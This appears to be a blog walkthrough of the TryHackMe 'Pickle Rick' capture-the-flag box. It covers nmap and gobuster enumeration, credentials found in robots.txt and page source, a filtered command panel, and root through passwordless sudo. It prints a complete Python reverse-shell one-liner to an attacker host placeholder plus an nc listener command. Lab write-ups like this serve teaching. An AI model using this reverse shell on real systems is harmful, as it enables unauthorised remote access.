Pickle Rick -CTF Walkthrough
Hello Everyone! Welcome to the new blog in this blog we are going to cover step by step challenge of a box named Pickle Rick on tryhackme.
Before starting make sure that you are connected to the tryhackme VPN and machine is deployed successfully.
After deploying the machine wait for 2–3 minutes and then ping the machine to confirm that it is working properly.
Now start the nmap scan to find out the ports open and services running on the machine.
Command : nmap -s -s -s -A 10.10.229.87 -oA pickle_nmap
There are 2 open ports. Port 80 and 22.
Let us scan for the directories using go buster.
Command : gobuster dir -u http://10.10.229.87 -w /usr/share/wordlists/dirb/common.txt -t 100 -o pickle_dir
Now will use the different wordlist for directory scanning.
command: gobuster dir -u http://10.10.229.87 -w /usr/share/SecLists/Discovery/web-content/directory-list-2.3-big.txt -t 100 -o piclr_dir2
After hitting the below url ,we get to Hep morty website.
On usual checking robots.txt, we found a password.
Further enumerating and inspecting the web page source code reveled the user name.
From our earlier directory scan we have login.php. Where get the login page.
Now we will use the obtained credentials.
We successfully able to login in portal and now we have a command panel. While executing the list command in the command panel we found that it has file called ‘Sup3rS3cretPickl3Ingred.txt’ and ‘clue .txt’. Let’s check the content of the file. While checking the content we found that the so many linux command are not allowed in this command panel.
But making slight modifications to cat command worked.
Let’s check the content of the ‘clue.txt’ and it saying that other flags are also in the file system.
Let’s first check the current working directory and our working directory is /var/www/html.
Now we will use the reverse shell python script to gain revershell. Befor this we will setup a listener in our local kali.
command : nc -lnvp 1234
python -c “import os,pty,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((‘LHOST’,LPORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv(‘HISTFILE’,’/dev/null’);pty.spawn([‘/bin/bash’,’-i’]);s.close();exit();”
As we can see we obtained reverse shell.
Now we want to escalate our privileges. On enumeration we found that the user www-data can execute all the commands with sudo permissions without passpowd
Command : sudo bash
And we got the root shell.
On searching we found the second ingredient also.
We successfully completed the challenge. Hope you enjoyed it.